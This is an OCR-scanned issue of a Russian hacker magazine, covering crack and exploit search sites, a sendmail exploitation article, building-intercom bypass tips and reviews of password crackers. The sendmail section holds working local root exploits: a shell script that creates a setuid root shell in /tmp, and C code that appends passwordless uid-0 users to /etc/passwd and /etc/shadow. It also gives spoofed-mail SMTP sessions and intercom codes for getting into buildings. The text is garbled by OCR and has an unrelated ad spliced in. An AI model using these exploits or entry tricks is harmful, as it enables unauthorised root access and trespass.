тов, CGI-ckaHepbl, сканеры NetBIOS, флуде om aden roma vores а 
ры, сетевые утилиты, системы firewall, сниф- 2 
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SWITCH ТО ENGLISH | CRACK. RU | CRACK.RU ФОРУМ | 


CRACEK.RU Ванна Exchange System 


ae | ОО 


Tema 

[+1] Dreamveaver Ultra Dev 4 
[+] У кого есть кряка? 
[+57] WINDOWS WHI S = 
norton personal firewall 
Crack Allplan #516 Vi6.0b 
GoldenSection Organizer 1.30 Bu- 
HELP}! - to Register TheBat! 1.- 
= CASE. Аналитик 
+] Как достать сетевой пароль в Win- 

р server 2000 to the guy t- 
ee взять кряк к АОН Pro v.4.7?- 


EREEE 


т 


ОТПРАВИТЬ СООБЩЕНИЕ 


aa: 


Kleptomania 2.2 


FE 


> 


SERRE 


www.crack.ru 


Еще один замечательный русскоязычный сер- 
вер, посвященный хаку. Но здесь ты не най- 
дешь ни статей, ни новостей, ни софта... А все 
потому, что это поисковая система! Она, ко- 
нечно, предназначена для поиска кряков. Но, 
умеет она искать и кряки, и рефераты, и му- 
зыку! А что тебе еще нужно? Движок у поис- 
ковика достаточно мощный, а дизайн легкий. 
В общем: то, что надо! 

Вот про поиск вроде все рассказал. А знаешь, 
что надо делать, если нужного тебе файла ты 
так и не нашел? Надо пойти в форум! Оказы- 
вается, на WWW.Ccrack.ru есть еще и он, роди- 
мый! Живет по адресу: http://forum.crack.ru/ . 
Форум выглядит бодренько, и на него, вроде 
как, даже кто-то ходит :). 


Итого: поисковая система - она и есть поиско- 
вая система. Говорить про нее много нечего, 
просто надо попробовать. Со своим назначе- 
нием она справляется, кроме того, есть фо- 
рум, который порой бывает очень полезен. 
Сайт имеет полное право попасть в закладки 
твоего браузера. 


Сломайте Sound Forge 5.0 


Универсальный эмуль HASP 
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astalavista.box.sk 


Еще один поисковик. Легендарнейший. 
Первое место, куда стоит пойти, если тебе 
что-то нужно. На сей раз, всё на англий- 
ском языке. Чрезвычайно популярный 
плейс. Если на www.crack.ru не удалось ни- 
чего найти, обязательно зайди сюда. Ог- 
ромная база данных с информацией о раз- 
личных сайтах делает этот поисковик од- 
ним из самых мощных средств поиска кря- 
ков. Все, что тебе нужно сделать - это 
ввести название проги и нажать “Submit”. 
И через несколько секунд ты увидишь ре- 
зультат поиска. Да, что я тебе все расска- 
зываю, ты наверняка сам знаешь об этом 
сайте лучше меня! 

А вот знаешь ли ты о дочерних проектах 
этого сервера? Если ты внимательно пос- 
мотришь на страничку, то увидишь ссылки 
на сайты посвященные различным при- 
кольным вещам. Это около пятнадцати те- 
матических сайтов, посвященных всему, 
что может заинтересовать тебя (читай: что 
ломается). Начиная играми и заканчивая 
мобильными телефонами. Естественно - эти 
сайты не рассказывают о том, что надо сде- 
лать, чтобы запустить игру или позвонить 
по мобильнику... 

Например, на mobile.box.sk - ты найдешь 
информацию о взломе мобильных телефо- 
нов, существующие секреты и прикольные 
мелодии для них. А на black.box.sk - разме- 
щена информация по защите компьютеров 
и все, что с этим связанно. Про DVD можно 
почитать на dvd.box.sk. Там есть все: но- 
вости, обзоры, взлом и т.д. О хаке, различ- 
ных утилитах, эксплоитах можно почитать 


Gat pout ааа ihr 


Pole 


на neworder.box.- 
sk. Это не все сай- 
ты, которые там 
есть. Информации 
очень много, и вся 
она очень инте- 
ресная. К сожале- 
нию, если ты не 
дружишь с англий- 
ским, тебе придет- 
ся читать кривой 
перевод Стилуса. 
:) А это не самый 
лучший вариант. 

Кроме всего этого 
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добра, у сайта есть свой IRC сервер. Его 
адрес: irc.box.sk (порт 6667). Там можно 
поговорить о любых материалах сервера, 
но опять же на английском. Список офи- 
циальных каналов можно найти на сайте 
astalavista.box.sk. 


Итого: замечательнейший поисковый pe- 
сурс. Ищет все, что только можно найти. А 
благодаря тому, что у сервера есть нес- 
колько дочерних проектов, ресурс стано- 
вится просто бесценным. К сожалению, 
многие пользуются им только как поиско- 
виком. Оценка: 5+ и почетное место в зак- 
ладках. 
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astalavista.com 


Предыдущий сайт (astalavista.box.sk) HaBep- 
Haka был тебе знаком, а вот как у тебя обстоят 
дела с сайтом astalavista.com? Первый раз о 
таком слышишь? Очень жаль, ведь сервер 
действительно заслуживает внимания. Тут та- 
кое количество информации, причем абсолют- 
но обо всем, что просто глаза разбегаются в 
разные стороны и ориентация в пространстве 
теряется. Сайт существует в двух версиях: ан- 
глийской и немецкой. 

Это огромный каталог всего, что относится к 
интернету, компьютерам, взлому. Прежде 
всего стоит начать с того, что на сайте есть, 
пожалуй самая большая в сети база доку- 
ментации по взлому и защите (на англий- 
ском языке). В базе есть материалы по раз- 
нообразным взломам, защите информации, о 
сетях и многом другом. Эта база постоянно 
пополняется и туда попадают новые инте- 
ресные материалы. 

Еще ты можешь найти большой список ха- 
керских поисковых систем и огромный ката- 
лог сайтов. Эти сайты посвящены, естес- 
твенно, взлому и защите информации. И ес- 
ть бета-версия рейтинга этих самых сайтов. 
Если ты практикуешься, рассылая вирусы 
друзьям, знакомым и просто случайным про- 
хожим, то на aStalavista.com ты найдешь ис- 
подники многих известных вирусов. Но и это 
еще не все. Тебе ведь обязательно нужны 
анонимные прокси-сервера? Тут ты найдешь 
длинный список. Не обошлось и без мобиль- 
ных телефонов. Много информации обо всех 
(или почти о всех) существующих мобилах. 
Как сделать двойника, как прошить трубу, 
как снять лок... 


ВСЯ СЕТЬ 


Все что есть на этом сайте просто не поддает- 
ся описанию: всего очень много, и все очень 
здорово. Есть еще различная интересная ин- 
тернет-статистика, полезные советы по 
JavaScript (с примерами), галерея картинок и 
флеш-файлов, и многое-многое другое. 

Для любителей зарабатывать деньги в сети 
есть партнерская программа. Если у тебя есть 
свой сайт, то можешь в ней поучаствовать. 
Может чего и заработаешь (например, от мер- 
твого бобра уши - прим. Ред.). :) 

Отдельно стоит отметить наличие файлового 
архива. Всего в нем более 400 файлов. Скачав 
их, ты будешь готов практически ко всему. 
Тут есть и утилиты для шифрования данных, и 
эксплоиты, и файрволы, и утилиты для IRC и 


ICQ, и вирусы, и... в общем, всего 22 различ- 
ные категории. Единственное, что я не нашел 
тут - крякер интернета. :) 


Итого: адрес этого сайта ты должен знать 
наизусть. Хочу поставить сайту все 10 (из 5) 
баллов, но сделаю это, только когда его пере- 
ведут на русский. :) 


шт 
[зева 00 
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rootshell.com 


Этот сайт полностью посвящен эксплоитам 
и документации к ним. 

На первой странице ты найдешь разные 
новости. Ну, а если тебе понадобился сам 
эксплоит, не спеши заходить в раздел с 
таким названием: там тебя ждет неболь- 
шой облом. Дело в том, что все эксплоиты 
которые находятся в этом разделе отсор- 
тированы по дате добавления. Естествен- 
но, при таком раскладе розыск (другое 
слово тут подобрать трудно) их оказы- 
вается достаточно затруднительным. 
Поэтому, если тебе что-то нужно восполь- 
зуйся поисковым полем. Оно-то точно те- 
бе поможет. 

Кроме собственно эксплоит, тут есть, как я 
уже говорил, раздел документации. В нем 
ты найдешь полезную информацию вне за- 


ВСЯ СЕТЬ 


висимости от того, насколько ты крутой 
хакер. Нет, конечно если это ты сломал 
сайты microsoft и yahoo, то тебе тут делать 
нечего. :) 


Итого: нужный и хороший сайтик. Поболь- 
ше бы ему разных разделов - было бы 
вообще супер. 


De pou have cecusty related news? Pleace e-mail t te newelircotshell com. 


To whom it may concern, 


ValueClick bannecs on uneitborized DRL, ValueClick banners on ' hacking’ 


No moantes will be paid for any elick=chroughs on chis aeeoont, as they were 
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www.technotronic.com 


Это огромный файловый архив. Ha их ФТП 
серверах находится просто море полезного 
софта. Тут есть все для взлома. Чего стоят 
только названия разделов: Novell, Microsoft, 
Unix, Denial of Service... Ты все правильно по- 
HAN, с помощью того что ты найдешь на сай- 


ValueClick.com determines rootshell.com is “hacking site 

Lay P arnt that PST 
After serving banner ada for the past few year? valueclbek.com har determined out of the bhee that 
reotsbell com it a hacking" amt, and per из AUT has termunated our account. you curently make 
une of ValweChok for your banner senang needs, we suggest you look elsewere 


From téerminatorivaluselick.com Thu Bee 14 10:44:07 2000 
13 Thee 2000 GBr24:27 =08ODo 
From: terminatorivalueclick.com 
Subject: Velueilick Locount Termination 


The ValueClick Host Site number 650001773 has heen termingsted for act 
in dgifect contravention of the Host lgreeresnc. 


- WAS —_- # 
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те, ты можешь творить страшные вещи. :) А 
для того, чтобы разобраться в этом огромном 
архиве, предусмотрен поиск. 

Кроме этого, на сайте есть раздел документа- 
ции. В него тоже полезно бывает заглянуть. 


Ну, и новости на первой странице, конечно. 
Для получения новостей можно подписаться 
Ha e-mail рассылку, и получать все новости 
почтой, избавляя себя от необходимости каж- 
дый день заходить на сайт. 
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Итого: В целом получился очень неплохой 
файловый архив, который стоит того, что- 
бы ты запомнил его адрес и регулярно по- 
сещал его. 


www. ukrt.f2s.com 


Если вдруг решишь заняться взломом всяких 
сайтов, используя с9!-скрипты, обязательно 
посети этот сайт. Тут размещена база о дыр- 
ках в скриптах, написанных на перл, пхп и 
т.п. Я для себя нашел несколько дырок в бес- 
платных форумах, и теперь пользуюсь ими 
для написания сообщений от имени админис- 
тратора. :) Кроме самих дырок на сайте есть 
форум, в котором эти дырки можно обсудить. 
А для облегчения поиска дырок есть специаль- 
ный раздел, в котором выложены сканеры. 


Итого: если сайт будет развиваться, то у него 
есть все шансы стать чрезвычайно популяр- 
ным. Будем на это надеяться. 


Вот и все (или почти все), что тебе необходи- 
мо посетить в сети. Если тебе этого покажется 
мало - вспомни, что почти каждый сайт имеет 
раздел ссылок. Удачи тебе в нелег- 
ком деле взлома! 


Aah 


Суршлаг в 


SENDMATLU 


MR. FALSE: MR_FALSE@MAIL.RU 


bl, как продвинутый никсоид, конечно, 

| знаешь, что есть такой демон sendmail. 

Висит он на 25-м порту и шлет всем мы- 

ло и посылки бандеролями по 800 г :). Он при- 

сутствует на многих серваках, в том числе и пре- 

доставляющих халявную мыльницу. А еще этот 

демон отличается избыточным наличием багов 

(гы). А нам, собственно, того от него и надо ;). 

Итак, я представляю здесь небольшой обзор не- 
которых дырочек. 


Баг нумбер ноль - анони- 
майзер 


Sendmail позволяет посылать анонимное мыло. 
Для этого даже не нужно обладать никакими 
правами на машине (правда, айпишник твой 


все-таки засветится в заголовке, но ламер-полу- 
чатель вряд ли разберется). Эта фишка, по сути, 
как таковым багом не является, но в каких це- 
лях ее использовать, я думаю, ты сам разбе- 
решься. Суть дела: коннектишься телнетом на 
какой-нибудь сервак с сендмылом на 25-й порт. 
А дальше получается диалог, весьма похожий на 
этот: 

220 smtp.ijjeaa.ru ESMTP 
Sendmail 8.11.0/8.11.0; Wed, 7 
Feb 2001 15:19:12 

+0600 

helo ijjeaa.ru 

250 smtp. ijjeaa.ru Hello 
vasiliy.pupkin.bass7.suxx_provi 
der.ru 

[31.33.7.255], pleased to meet 
you 

mail 
from:<ijjeaa@pentagon.mil> 

250 2.1.0 
<ijjeaa@pentagon.mil>... Sender 
ok 

rcpt 
to:<vasiliy_pupovidze@ijjeaa.ru> 
250 2.1.5 
<vasiliy_pupovidze@ijjeaa.ru>... 
Recipient ok 

data 
354 Enter mail, 
end with “.” on 
a line by itself 
/*Чтобы закон- 
чить мессагу, 
давишь ентер, 
потом точку, 
потом опять 
ентер.*/ 
Subject: Вни- 
мание! 
Гражданина 
Грузии Васи- 
лия Иййееови- 
ча Пуповидзе 
просьба (убе- 
дительная) 
пройти к цен- 
тральным во- 
ротам! 


250 2.0.0 
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#17F73a00523 

quit 

221 2.0.0 smip.ijjeaa.ru closing 
connection 

Connection closed by foreign 
host. 


Вскоре Василий Пуповидзе получит долгождан- 
ное мыло ;). 


Баг нумбер раз - админис- 
тратор... молодец 


Версия демона: 8.8.4 (возможно, и 8.8.5) 
Краткое описание: 

Если адрес получателя не существует (ну нет 
МЫЛЬНИЦЫ Сс Таким названием), TO сендмайл nu- 
шет текст письма в файл /var/tmp/dead.letter. А 
кто нам мешает слинковать, скажем, /etc/passwd 
и /var/tmp/dead.letter? Итого, имея какие-ни- 
будь права на атакуемой машине, посылаешь 
мыло с соответствующим содержанием через ее 
сендмайл (данной версии, разумеется) на заве- 
домо несуществующий адрес. 

Пример: 

[MrFalse@localhost MrFalse]$ т 
/etc/passwd /var/tmp/dead.let- 
ter 

[MrFalse@localhost MrFalse]$ 
telnet smtp.super_m.org 25 
Trying 31.33.7.0... 

Connected to 
smitp.super_m.org. 

Escape character is ‘“]’. 

220 smtp.super_m.org ESMTP 
Sendmail 8.9.4/8.9.5; Fri, 9 Feb 
2001 18:19:15 

+0600 

helo super_m.org 

250 smtp.super_m.org Hello shl- 
ynxel.zasranec.ru [15.05.40.7], 
pleased to meet you 

mail from: <ijjeaa@tyt.net> 

250 2.1.0 <ijjeaa@tyt.net>... 
Sender ok 

rcpt to: <ijjeaa@daje.tyt.net> 
250 2.1.5 
<ijjeaa@daje.tyt.net>... 
Recipient ok 

data 
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354 Enter mail, end with “.” on a line by itself 
MrFalse::0:0O:ijjeaa rulez: /root:/bin/bash 


250 2.0.0 f19CJpM00584 

quit 

221 2.0.0 smtp.super_m.org closing connection 
Connection closed by foreign host. 

В результате сендмыл запишет строку “MrFalse::0:0:ijjeaa 
rulez:/root:/bin/bash” в /etc/passwd, и мы имеем юзверя MrFalse (хотя ме- 
ня, конечно, иметь лучше не стоит ;))) без пароля и с правами рута! Плю- 
сы: Баг достаточно прост в использовании. 

Минусы: Обязательно наличие юзверских прав на ломаемой машине. Не 
работает в следующих случаях: 

1) /var uv / на разных разделах. 

2) /var/tmp отсутствует или доступ туда закрыт. 

3) на машине присутствует postmaster, т.е. ошибочные письма не попа- 
AYT B 

/var/tmp/dead. letter. 


Bar нумбер два раза - два админа-молод- 
ца, одинаковых с лица 


Версии демона: до 8.10.0 (8.9.3 - абсолютно точно) Все эти превосход- 
ные версии содержат целых 2 бага, а именно: 

1) Возможность запихивать LMTP (local mail transfer protocol - протокол 
передачи локальной почты)-команды прямо в тело сообщения. 

2) Возможность создания тупика между сендмайлом и mail.local. 
Описание: 

1) Пока mail.local в режиме LMTP ищет в теле мессаги строку “./п” - конец 
сообщения, сендмайл не пропускает ее. Но если в теле мессаги встроить 
строку “(2047 chars).\n”, то получится мнимый конец :). Остаток мыла бу- 
дет воспринят как [МТР-команды. Это позволяет, например, посылать 
сообщения на несколько ящиков сразу, в обход самого сендмайла и 
фильтров. 

2) Но mail.local возвращает результат выполнения (МТР-команды сен- 
дмылу. Но поскольку в данный момент времени он не ждет этих сообще- 
ний, буфер ввода/вывода будет просто наполняться ими. При большом 
количестве команд (или просто текста, ведь он тоже будет воспринимать- 
ся как команды, а следовательно тай. оса! будет выдавать ошибки) бу- 
фер будет просто забит и возникнет пресловутый тупик. 


Баг нумбер два раза по два - люблю адми- 
нов я 


Версии демона: 8.10.0 и 8.10.1 (только на Solaris’e) 

Описание: Эти версии тоже, как ни странно, содержат два бага: 

1) Версия сендмыла 8.10.0 для соляриса предоставляла такую вещь, как 
“Content-Length”. По ней определяется, сколько места будет занимать 
мыло навинте. Мол, эта фича у нас новая такая. Но они не учли возмож- 
ность, что злобные хацкеры могут заменить реальный “Content-Length” 
на подставной “Content-Length:99999999” %))). Особенно забавный ре- 
зультат достигается, если в конце заголовка вставить следующее: 
“(2047 chars)\n 

Content-Length: 99999999\n” 

2) Если тело сообщения пусто, а в конце заголовка стоит “(2047 
chars)Content-Length: \п”, то следующая мессага будет “приклеена” к 
этому заголовку, потому что строка “\n” будет потеряна, пока сендмайл 
пытается считать Content-Length. 


Баг нумбер три - сюда смотри 


Версии демона: 8.7 - 8.8.2 (Linux и OpenBSD) Описание: У сендмайла 
этих версий существует так называемый smtpd-6bar. Что это такое и кого 


Интернет-магазин с доставкой на дом 


Заказ по интернету; > e~shop 


http: Avww.e-Shop,. ru @® &nitp://www.e-shop.ru 
e-mail: sales@e-shop.ru (095) 258-8627 
Доставка по Москве v,Cankt тербургу $3, (09 ) 928-6089 


по Московской области $ 
Представительство в`Санкт-Петербурге: 928-0360 


eshopG@litepro.spb.ru j 1 2) 311-8312 


Только 8 Марта 
на все заказы, поступившие от прекрасной половины 
человечества предоставляется СКИДКА 8% 


о ``: 
3 1 fam 
nN t 


No One Lives Forever (рус-док.) Ultima Online: Game Time Half-Life Generation 


Hells fie ‘Mopnapr Diablo Il (рус. док) 


Montego || Quadzilla Force Feedback Racing Wheel 


$39.99 $179.99 


СИТЕК - ИНТЕРНЕТ 50 Pilot Mouse Sound Blaster Live 1024 Jet Leader 3D 


Заказы по телефону можно сделать с 10.00 до 19.00 без выходных 
Заказы по интернету — круглосуточно 


В нашем магазине действует услуга 48 часов Money Back см.Подробности на www.e-shop.ru 


им кормят, объяснять достаточно долго (скажу 
только, что баг это достаточно известный). 
Код эксплоита (в оригинале): 


# Hi! 

# This is exploit for send- 
mail smtpd bug 

# (ver. 8.7-8.8.2 for 


FreeBSD, Linux and may be 
other platforms). 

# This shell script does a 
root shell in /tmp directory. 

# If you have any problems 
with it, drop me a letter. 

Have fun ! 


OHHHHHH 


# HH + 


Leshka Zakharoff, 1996. 
E-mail: leshka@leshka.chu- 
vashia.su 

# 


# 

# 

echo ‘main() ‘>>lesh- 
ka.c 

echo { ‘>>leshka.c 
echo ‘ 


execl(“/usr/sbin/sendmail”,”/tm 
p/smtpd”,0); ‘>>leshka.c 


echo ‘} ‘>>leshka.c 
# 

# 

echo ‘main() 

‘>>smtpd.c 

echo ‘{ ‘>>smtpd.c 
echo ‘ setuid(0); set- 
gid(0); ‘>>smtpd.c 

echo system(“cp 
/bin/sh /tmp;chmod a=rsx 
/tmp/sh”); ‘>>smipd.c 
echo ‘} ‘>>smtpd.c 
# 

# 

cc -o leshka leshka.c;cc -o 
/tmp/smtpd smtpd.c 
./leshka 


kill -HUP “ps -ax| grep 
/tmp/smtpd| grep -v grep|tr -d ‘ 
‘|tr -cs “[:digit:]” 

“\п” |веаа -n 1° 

rm leshka.c leshka smtpd.c 
/tmp/smtpd 


echo “Now type: /tmp/sh” 


Как ты видишь, это - Wenn скрипт. Вот и сохра- 
ни его как s.sh и сделай его запускаемым (то 
бишь chmod 700 s.sh). Не вдаваясь в подробнос- 
ти, скажу, что этот скрипт создает Wenn /tmp/sh, 
запустив который, хацкер может познать безгра- 
ничные возможности рута на машине ;). 


Плюсы: Легкость в использовании. Минусы: Баг 
и версия демона достаточно стары (если учиты- 
вать то, что последняя версия сендмайла - 
8.11.2). Нужно иметь юзверские права на ло- 
маемой машине. 


Баг нумбер четыре - каждой 
пырке по тырке 


Версия демона: практически любая (ограниче- 
ния накладываются лишь на версию самой оси). 
Опись: дело в том, что любой демон в *nix сис- 
темах обладает правами рута (т.е. их uid/gid == 
0). Все это относится и к сендмайлу. 
ГЫГЫГЫГЫ... 

Код эксплоита (Файло ех.с): 

#include <linux/capability.h> 


int main (void) { 
cap_user_header_t header; 
cap_user_data_t data; 


header = malloc(8); 
data = malloc(12); 


header->pid = 0; 
header->version = 
_LINUX_CAPABILITY_VERSION; 


data->inheritable = data- 
>effective = data->permit- 
ted =0; 

capset(header, data); 


execlp(“/usr/sbin/send- 
mail”, “sendmail”, “-t”, 
NULL); 

} 


Файло add.c: 
#include <fcntl.h> 


int main (void) { 
int fd; 
char string[40]; 


seteuid(0); 

fd = open(“/etc/passwd”, 
O_APPEND|O WRONLY); 
strcpy(string, 
“shlynx:x:0:0::/root:/bin/sh\n”); 
write(fd, string, strlen(string)); 
close(fd); 

fd = open(“/etc/shadow”, 
O_APPEND|O WRONLY); 
strcpy(string, “shl- 
ynx::11029:0:99999:7:::”); 
write(fd, string, 
strlen(string)); 

close(fd); 


Пример: 
Во-первых, 
эксплоит ;). Создай файло “mai 


не забудь закомпилить 
Ми впи- 
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ши туда следующее (без кавычек): 
“From: <shlynx@edet_v_m.org> 
To: <nadeyus@ya_skoro_um.ru> 
Subject: Галлон отстоя ему в ухо! 
Ну. 3! 


v 


Теперь создай файл “. forward” со следующим со- 
держанием: 

“|/path/to/add" - путь к файлу add. 

И, наконец, выполни команду “./ех < mail”. 
После успешного выполнения у тебя должен 
появиться новый юзверь shlynx без пароля и с 
uid/gid==0, то бишь с правами рута. Все доволь- 
ны, и все такое. 

Плюсы: Опять же простота. Работает с любым 
сендмайлом. 

Минусы: Необходимо иметь какие-то права на 
машине. Не очень много осей, на которых это 
катит. 

Ну, вот такие пироги! Удачи тебе, молодой поч- 
тальон-убийца! Обходи дураков за километр и 
не обижай маленьких :). 
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OOMOPOH - 


враг настоящего хакера 


холод (HOLOD@xXAKEP.RU) 


Мы стоим под подъездом и ждем, 
Не пустит ли кто нас в дверь. 


у, с домофонами всё понятно: нас- 
Е тоящий хакер - за свободный доступ 

к информации. Даже бутаритарский 
хакер - и тот ненавидит домофоны, а в дале- 
кой Бутаритарии они на каждом втором 
подъезде. Как открываются цифровые домо- 
фоны, Х уже писал в одном из первых номе- 
ров. Напомню, цифровой бутаритарский до- 
мофон выглядит так: зеленый мониторчик; 
под мониторчиком инструкция и микрофон; 
справа от мониторчика кнопки с набором 
цифр от 0 до 9; слева от кнопки 0 стоит кноп- 
ка с ключиком, справа - кнопка “DEL”. Любой 
бутаритарский домофон имеет свой код, с по- 
мощью которого ты можешь захватить устрой- 
ство под свой контроль. 
Посмотри на монитор. Если на нем ничего не го- 
рит, то домофон сломан, и дверь откроется без 
всяких паролей. На рабочем домофоне горит 
одна точка. Нажми на кнопку с изображением 
ключа, на мониторе появится “—-”, вводи 
987654 (слышится двойной звуковой сигнал), 
затем вводи 123456. Если на мониторе появи- 
лась буква “Р”, значит, ты благополучно взял 
домофон под свой контроль. Теперь чтобы от- 
крыть дверь, нажимай цифру “8”, и дверь от- 
кроется. Вот и всё! После того, как ты откроешь 
дверь, Ha домофоне загорится “Р—1"или “Р—4". 
Рассмотрев возможности атаки, надо рассмот- 
реть возможности защиты от данной пробле- 
мы. Защититься просто элементарно! Если ты 
подходишь к домофону и видишь на нем “P— 
"или “P—4", то ты сразу понимаешь, что ка- 
кой-то придурок пытается его сломать. Чтобы 
отключить данную проблему, просто нажми 
“DEL” и кнопку, которая горит на мониторе, 
одновременно! И всё. 


Замки 


Последнее время некоторые бутаритарские 
дома оснащают кодовыми механическими 


замками. Для того, чтоб открыть такой 
замок, требуется нажать на две, или 

на три кнопки одновременно. 
Причем, если даже нажать на 
все кнопки сразу - замок не 
открывается. И прихо- 
дится  бутаритарским 
юношам стоять под 
дождем и снегом часа- 

ми, пока какая-нибудь 


местная бабушка не 
впустит их внутрь, 
предварительно обма- 
терив. 


Но, как показала прак- 

тика, и против такого 

лома есть прием! Дело в 

том, что металлические 

кнопки на бутаритар- 

ских кодовых замках от 
постоянных нажатий 
окисляются. Но, сам по- 
нимаешь, нажимаются-то 
постоянно одни и те же 
две-три кнопы! И они уже 
через короткий промежуток 
времени оказываются отлич- 
ными по цвету от своих соб- 
ратьев - темнее (или просто 
более облезлыми). Вот простой 
пример. Если на кодовом замке 
код “70”, то, соответственно, циф- 

ры “7” и “0” будут наиболее заля- 
панными и облезлыми \ окисливши- 
мися. На них и надо жать супер-бута- 
ритарскому-хаксору! Уловил? 

Ну, всё. Надеюсь, теперь у тебя не бу- 
дет проблем с бутритарскими подъезда- 
ми, и тебе не придется куковать под ок- 
ном любимой хаксорши. 


Удачи! 
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ЬЗОР 


порочных прог 


ГАЛИЧЕВ АНТОН AKA GALANT (HTTP://VBMANIA.H1.RU) 


арова, перец! В связи с тем, что HO- 

мер, как ни крути, посвящен преи- 

мущественно основам взлома уда- 
ленных систем и сетей, я решил тебе немного 
рассказать об инструментах, которые помогут 
любому хацкеру в его нелегком деле =). Сразу 
предупреждаю: используй эти проги на свой 
страх и риск. 


John The Ripper 


http://www.spaceports.com/~w 
oland/soft/hack/john.zip 


К сожалению, взлом UNIx системы не заканчи- 
вается на получении файла с паролями, так как 
злые Юниксоиды зачем-то его зашифровали, 
причем таким образом, что никакой прямой пе- 
ребор тебя к цели не приведет. А вот без знания 
пароля ты вряд ли сможешь доказать всем, кто 
на этом свете самый супер-хацкер и почему дя- 
дя Билл значительно лучше, чем их юниксои- 
довский пингвин =). Как хорошо, что на свете 
еще существуют сетевые администраторы, кото- 
рые забывают собственные пароли, и програм- 
мисты, которые позволяют им справиться стаки- 
ми неприятностями. Именно благодаря им и поя- 
вилась на свет программа John The Ripper, или, в 
переводе с английского на нормальный, “Джон- 
потрошитель”. Действительно, такое название 
вполне себя оправдывает, так как файлы с па- 
ролями она просто-таки разрывает на кусочки, 
подвергая самому тщательному анализу. Итак, 
стоит скормить ей файл с UNIX-naponamn и ска- 
зать, с помощью какого из методов вести подбор 
пароля, - и можно спокойно уходить пить пиво, 
пока программа будет работать. Разнообразие 
вариантов взлома не оставит разочарованным 
даже самого искушенного хацкера. Начиная от 
простейшего перебора по словарю и прямого пе- 
ребора всех комбинаций и заканчивая сложны- 
ми правилами формирования возможных паро- 
лей. Программа поставляется в двух вариантах: 
простом и оптимизированном под ММХ-процес- 
сор, причем его обладатели получат еще нес- 
колько тысяч перебранных паролей в секунду. 
Программа способна во время одного сеанса 


подбирать ключи ко всем зашифрованным паро- 
лям из файла, а также может вести отбор и, нап- 
ример, искать только администраторские паро- 
ли. Как показывает практика, системные адми- 
нистраторы тоже люди :), и, например, из 20-30 
зашифрованных паролей у вас есть очень боль- 
шие шансы получит 4-5 расшифрованных. Это 
довольно неплохие показатели. Кстати, прог- 
рамма может работать с различными версиями 
криптоалгоритма и в самом начале сообщает вам 
о том, чем именно была зашифрована вожделен- 
ная информация. Вместе с Ripper’om поставляет- 
ся довольно подробная документация с большим 
количеством примеров и советов, которые помо- 
гут тебе более эффективно вести перебор. 
Встроенный анализатор позволяет генерировать 
возможные пароли прямо из существующих ло- 
гинов, причем эффективность такого рода гене- 
рации тоже очень высока. По крайней мере па- 
роли, совпадающие с логинами, программа на- 
ходит практически мгновенно. Последние вер- 
сии Женьки-Потрошителя способны на взлом 
паролей WinNT. В общем, лучший выбор взлом- 
щика для Unix-naponen - это именно John Ripper 
с его уникальными возможностями и оптимизи- 
рованным алгоритмом перебора. 


WWWHack 
http://www.wwwhack.com/ 


Следующая программа, о которой я хотел бы 
рассказать широкой аудитории, называется 
WWWHack (она еще упоминается в этом выпус- 
ке). Если ты любитель WWW-based атак, то луч- 
шего ты просто не найдешь. Богатейшее раз- 
нообразие возможностей, быстрота использова- 
ния, приятный и простой интерфейс не оставят 
тебя равнодушным. Для чего же она предназна- 
чена? Для эффективного перебора паролей сай- 
тов тех людей, которые почему-то не хотят от- 
крывать свою информацию для широкого круга 
пользователей. Кроме двух рук, растущих из 
двух разных мест, для работы c WWWHack тебе 
больше ничего не потребуется, так как простота 
настройки с лихвой окупается обилием возмож- 
ностей. Ну как тебе, например, брутфорс по ло- 
гинам и паролям, причем логины берутся из 
файла, а пароли генерируются прямым перебо- 
ром? В прогу встроена возможность подключе- 
ния своих файлов с паролями, причем дублика- 
ты в них будут самым безжалостным образом 
уничтожены, и тебе больше не придется ползать 
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по полу с большой лупой и искать, “где я уже это 
заразное слово видел”. Для любителей медлен- 
ных и неторопливых взломов, прерываемых 
встречами с девушками или опустошением оче- 
редной банки пива, предусмотрена возможность 
сохранения. Программа позволяет перебирать 
пароли до первого найденного или может оста- 
навливаться по окончанию перебора. Каждый 
раз при запуске взломщик будет представляться 
по-разному, и если злобный админ вдруг попы- 
тается посмотреть, а что же это за пользователь 
уже сотый раз пытается вспомнить свой пароль, 
попутно периодически путая логин, увидит в ло- 
гах сплошную кашу. А особенно хорошо он по- 
чувствует себя, когда поймет, что этот настыр- 
ный пользователь еще и пользуется прокси, ко- 
торый WWWHack тоже поддерживает. Также в 
программу встроена возможность так называе- 
мых HTML-based атак, то есть атак, основанных 
на \М/ЕВ-интерфейсе. Всякие там почтовые сер- 
вера, форумы, доски объявлений, сайты знаком- 
ств как нельзя лучше подходят под это описа- 
ние. Все полученные программой пароли сохра- 
няются в специальном окне, причем в любой мо- 
мент можно одним нажатием мыши проверить их 
работоспособность. Для тех, кто не привык до- 
верять красивым окошкам, ведутся подробней- 
шие логи противоправных :) действий - навер- 
ное, для пущей наглядности. Размер программы 
384 Кб, поэтому ты вполне можешь ею обмени- 
ваться со своими жадными до чужих паролей 
друзьями через Интернет. 


дется известный спор, какая операционка луч- 
we: Unix или Windows МТ. Ты тоже можешь поу- 
частвовать и, наконец, решить, кто круче, пин- 
гвин или дядя Билл. Но, вне зависимости от ито- 
гов твоих разбирательств, рано или поздно ты 
столкнешься с проблемой взлома паролей одной 
из этих операционок. И если Женька Риппер по- 
может тебе справиться с пингвином, то посмот- 
реть, что же внутри у 
дядюшки Гейтса, те- 
бе поможет только 
эта программа. Паро- 
ли в WinNT хранятся 
во многих местах и 
иногда даже в том 
месте, где им, каза- 
лось бы, незачем на- 
ходиться, и именно 
поэтому программа 
умеет выдирать их из 
реестра, импортиро- 
вать из SAM файла, а 
также перехватывать 
в локальной сети. 
Отмечу одну особен- 
ность: если ты ло- 
маешь пароль не из- 
под МТ, то тебе пот- 
ребуется провести 
некоторые манипу- 
ляции с 5АМ-файлом. Подробнее об этом напи- 
сано в документации LOpht, которая, помимо 
этого, содержит 
очень подробное опи- 
сание использования 
всех возможностей 
программы. Подбор 
паролей может 
производиться мето- 
дом полного перебо- 
ра и, по желанию, 
гибридным перебо- 
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LOpht Crack v2.5 


http://www.securitysoft- 
waretech.com 


Среди интернетчиков и хакеров уже давно Be- 


ром по словарю. Этот 
перебор отличается 
от обычного словар- 
ного тем, что к концу 
каждого слова из сло- 
варя прибавляется 
комбинация из ука- 
занного количества 
символов. Теперь да- 
же твоя соседка, по- 
мешанная на компью- 
терной безопасности 
и не пропускающая 
тебе в туалет без па- 
роля, который меняется каждые несколько 
дней, не сможет спать спокойно. Все ее стара- 
ния как-то разнообразить пароль, приведя его, 
например, к виду “pass029”, не увенчаются ус- 
